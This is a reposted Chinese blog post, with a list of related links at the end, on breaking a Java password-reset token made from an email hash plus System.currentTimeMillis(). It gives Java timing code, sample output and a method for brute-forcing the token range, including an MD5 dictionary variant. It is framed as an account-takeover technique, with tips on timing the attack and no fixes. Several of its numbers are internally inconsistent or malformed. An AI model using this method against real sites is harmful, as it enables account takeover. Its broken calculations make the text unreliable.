• 利用系统时间可预测破解java随机数


    By kxlzx https://www.inbreak.net/
    摘要:
    这是一个随机函数破解的经典例子。在java程序中,获取随机数的做法有多种。但是我们实现一个随机token,并用于认证时,通常第一时间,想起来使用“System.currentTimeMillis”,本文会详细讲解一次破解随机数的经过。

    正文:

    “System.currentTimeMillis”这个方法,返回从UTC 1970年1月1日午夜开始经过的毫秒数。执行结果,可能是类似“1315395175327”这样的数字,因为后面的几位,是毫秒,所以执行结果就好像“随机”一样。
    今天遇到的一个系统,相关业务逻辑场景,是用于找回密码。首先要求用户输入自己的邮箱,系统算出来一个token,发给用户邮箱,让用户使用token,执行修改密码的这一步。
    1、输入邮箱。
    2、发送邮件给用户邮箱。
    3、根据邮箱中的链接,修改密码
    就是说,只要能破解了服务器给用户生成的token,就可以直接修改用户密码。
    在生成token时,采用了这样一段代码:

    public String genToken(String email) {
    String token = email.hashCode() * 21 + System.currentTimeMillis() + "";
    return token;
    }

    从代码上可以看到,Email的hashcode,在用户的email固定的情况下,是不变的,那么这个不变的数字,即使乘以21,依然是不变的。只要知道了用户的email,就可以知道这个数字。
    真正随机的只有System.currentTimeMillis()
    这个方法貌似随机,条件允许的情况下,其实是可以破解的。

    利用系统时间可预测破解java随机数:

    根据以上流程,只要攻击者提交

    https://www.inbreak.net/user/findpassword.action?email=4700012@qq.com

    就可以给攻击者的邮箱,发一封EMAIL。
    ================
    你好,空虚浪子心:
    请点击链接重置密码。该链接24小时内有效。
    或将以下链接拷贝到浏览器地址栏中:

    https://www.inbreak.net/user/resetpassword.action?token=1315336352414

    该邮件由系统自动发送,请勿直接回复此邮件。
    ==============
    随后的那个token,就是随机生成的数字。同理,输入另一个用户(被攻击者)的邮箱,也可以发送一封email。如果服务器上的时间,和攻击者机器上执行的时间一致,在不考虑网络传输成本的前提下,是可以直接得到token的。
    当然,这不可能。
    但是好在我们的时间速度,和服务器的时间速度,基本一致。注意,这里讲的不是时间一致,是时间的速度一致,可能本地的时间是10点,服务器是11点,那么当本地的时间为11点时,服务器必然已经12点了。
    我们的时间,和服务器时间,总是会相差一个数字。
    网络速度,每次传输都不一致,第一次发出请求,可能用1.020秒,第二次,用0.921秒。
    没关系,我们尽量让它变得可预测些。
    在本地,写这样一段代码:
    =================

        public static void main(String[] args) throws IOException {
           System.out.println(i + 1);
           i++;
           System.out.println("------mystart");
           System.out.println("4700012@qq.com ".hashCode() * 21
                  + System.currentTimeMillis());
           sendPost("https://www.inbreak.net/user/findpassword.action?email=4700012@qq.com");
           System.out.println("4700012@qq.com".hashCode() * 21
                  + System.currentTimeMillis());
           System.out.println("------myend");
           System.out.println("------user start");
           Long x = "10000@qq.com".hashCode() * 21
                  + System.currentTimeMillis();
           System.out.println(x);
          sendPost("https://www.inbreak.net/user/findpassword.action?email=10000@qq.com");
           Long y = "10000@qq.com ".hashCode() * 21
                  + System.currentTimeMillis();
           System.out.println(y);
           System.out.println(y - x);
           System.out.println("------user end");
        }

    =================

    代码流程,使用文字描述:

    1、 打印攻击者的开始时间。

    2、 发邮件给攻击者。

    3、 打印攻击者的结束时间。

    4、 打印要破解的用户开始时间

    5、 发邮件给要破解的用户。

    6、 打印要破解的用户结束时间

    7、 打印请求服务器给用户发邮件的用时

    程序执行的结果如下:
    ======================

    ------mystart
    1315395175327
    1315395175437           //攻击者的结束时间
    ------myend
    ------user start
    1316945857268
    1316945857305            //用户结束时间
    37                        //用户结束时间减去用户开始时间 = 网络延迟。
    ------user end

    ======================
    于此同时,收到了一封邮件,token为“1315395156493”。
    然后根据以下的计算公式:
    攻击者的结束时间(已知) – 服务器给攻击者发邮件的时间(已知) = 时间差(可以算出来)
    用户结束时间(已知) – 服务器发给用户邮件时间(就是未知数x) = 时间差(前面算出来的)
    可以算出给用户发邮件的时间,这个时间是模糊的,还需要加减当时的网络延迟(刚才程序打印出来了),才能得到一个最终区间。
    再写段代码:
    =============================

    Long myendtime =  Long.valueOf("1315395175437"); //在我本地执行完给我邮件发送的时间
    Long userendtime =   Long.valueOf("1316945857305"); //在我本地执行完给用户发邮件的时间
    Long myservertime =  Long.valueOf("1315395156493"); //服务器给我发邮件的时间
    Long userservertime = userendtime - (myendtime-myservertime);
    System.out.println(userservertime);

    ===================================
    这段代码打印出了结果:

    1316945838361

    这是我们预测的,服务器给用户的发邮件时间范围基数。
    最终数字,应该是这个值加减37(当时的网络延迟),也就是1316945838324到131694583832474的范围内。
    下面交给WVS处理

    很快的,得出结果,第一列的response内容大小,和其他的不同,大家都是1153B,只有这一条是2685B,说明内容不一样,这就是答案了。

    得到答案,我们访问页面看看。

    图中可以看到,攻击者可以已经破解了token,可以直接修改密码。
    在做网络攻击时,当然情况可能不一致,网络延迟如果很久,可以换网速好,延迟少的机器。最好在半夜三更的时候进行,成功几率大很多。

    进阶攻击:

    当然,会有开发自作聪明,给最终数字,也就是token,加上MD5。这的确可以增加攻击成本,但是实质上还是自欺欺人。对于攻击者,只需要在固定的时间范围,就可以放一个字典。

    1316945838361 -- 7bfe0596e68cb9c43bfd0749d835c62d

    一一对应,在最终做算术题中,多几次查询即可。
    我们可以就拿以上示例,给大家进阶一下。
    代码为

        public String genToken(String email) {
            String token = email.hashCode() * 21 + System.currentTimeMillis() + "";
            return md5(token);
        }

    和前文代码基本一致,只是返回时,最终调用了md5。
    假设还是上次的结果,服务器会返回:

    Token=8b4a258acdff3bf44ed88d174ed0be20

    这个token其实就是时间的加密,他的解密肯定在一定的时间段范围内。我们首先要找到特征。
    执行一下当前时间,先看看我的时间,1315395175437,这是一个long类型。
    通过

    System.out.println(new SimpleDateFormat("yyyy-MM-dd HH:mm").format(new Date(1315395175437)));

    得出结果:

    2011-08-29 20:39

    经过不断的修改数字,可以看出
    13153951,也就是前8位,代表几月几号几点。
    75437,也就是后面5位,代表几分几秒。
    服务器时间就算再傻,也不能把今天,算成明天,最多和我们本地,相差个多少分钟。
    所以我们做字典,在数据库录入:

    以“13153951”为固定前缀+5位数字 (00001到99999)

    之后在这个表,增加一个字段,是前面那个字段的MD5值,当然,如果不放心,可以再往前加几位,就是固定前缀“1315395”+ 6位数字,以此类推,数据库不会很大。
    这个字典,有什么用呢?
    前文说到服务器会给我发邮件,告诉我Token=8b4a258acdff3bf44ed88d174ed0be20,这个md5对应的数字,必然会在这个字典里,所以可以直接从字典中查出来这个md5。
    其后的流程,就和前文破解一致。
    再次贴一遍结果:
    ======================

    ------mystart
    1315395175327
    1315395175437           //攻击者的结束时间
    ------myend
    ------user start
    1316945857268
    1316945857305            //用户结束时间
    37                        //用户结束时间减去用户开始时间 =打印请求服务器给用户发邮件的用时,也就是网络延迟。
    ------user end

    ======================
    之后按照公式,当然会算出1316945838361,是我预测的,服务器给用户的发邮件时间范围基数。
    最终数字,应该是这个值加减37(当时的网络延迟),也就是1316945838324到131694583832474的范围内。
    将以上范围所有数字,md5加密一下,做成字典,放在wvs中跑一遍,一定也能得出结果。
    以上纯属推测,并没有示例测试,但是思路是正确的。

    再次进阶

    从上面的内容中,大家知道并不是看到token,就想当然的以为没办法,我们从黑盒测试的角度,甚至可以做这样一件自动化的事情,以便直接快速的破解。
    当我们看到有存在md5的token后,直接执行以下几步。
    写小程序,将以下流程尽量自动化:
    1、获取当前时间,其中可以加入用户名前缀的hash,也可以加入email等hash,总之,token的内容,是和用户相关,并且是固定的,联想到我们注册时,也就填写了用户名、email,肯定是相关的。用户名或email+随机数,排列组合一下,分别走一遍前三步。
    2、时间范围定在1小时内(前面几位数字固定前缀即可),生成md5字典。
    3、获取自己账号的token,然后在字典中,得出结果。
    4、如果第三步成功,基本就可以确定漏洞存在。后面利用公式,计算出服务器给用户token的时间基数,正负时间差,做成md5字典。
    5、WVS跑一遍字典,查看服务器返回数据大小,从而得出用户的token。
    如果我们已经有生成token的代码,就像文章中的示例,就可以省略猜测算法的步骤了。在生成token的时候,肯定有不少人犯了这样的错误,本文主要谈攻击思路,至于修补方案就不管了,大家懂得。
    By kxlzx https://www.inbreak.net/

  • 相关阅读:
    php大力力 [036节] 后台系统的登录页面界面做完啦
    php大力力 [035节] 先记录一些链接
    php大力力 [034节] 今天做出系统后台页面的界面啦
    php大力力 [033节] 随便看看:PHP程序员学习C++
    php大力力 [032节] php设计时候遇见麻烦:XQB50-H8268 进水电磁阀
    php大力力 [031节] php设计系统后台菜单和样式设计
    php大力力 [030节] php设计系统后台菜单
    php大力力 [029节] 做PHP项目如何下载js文件:使用腾讯浏览器把网上案例页面存储到本地
    php大力力 [027节] 被百度收录较好的几个视频网站示例
    SQL Server 创建触发器(trigger)---转载
  • 原文地址:https://www.cnblogs.com/gao88/p/10593098.html
Copyright © 2020-2023  润新知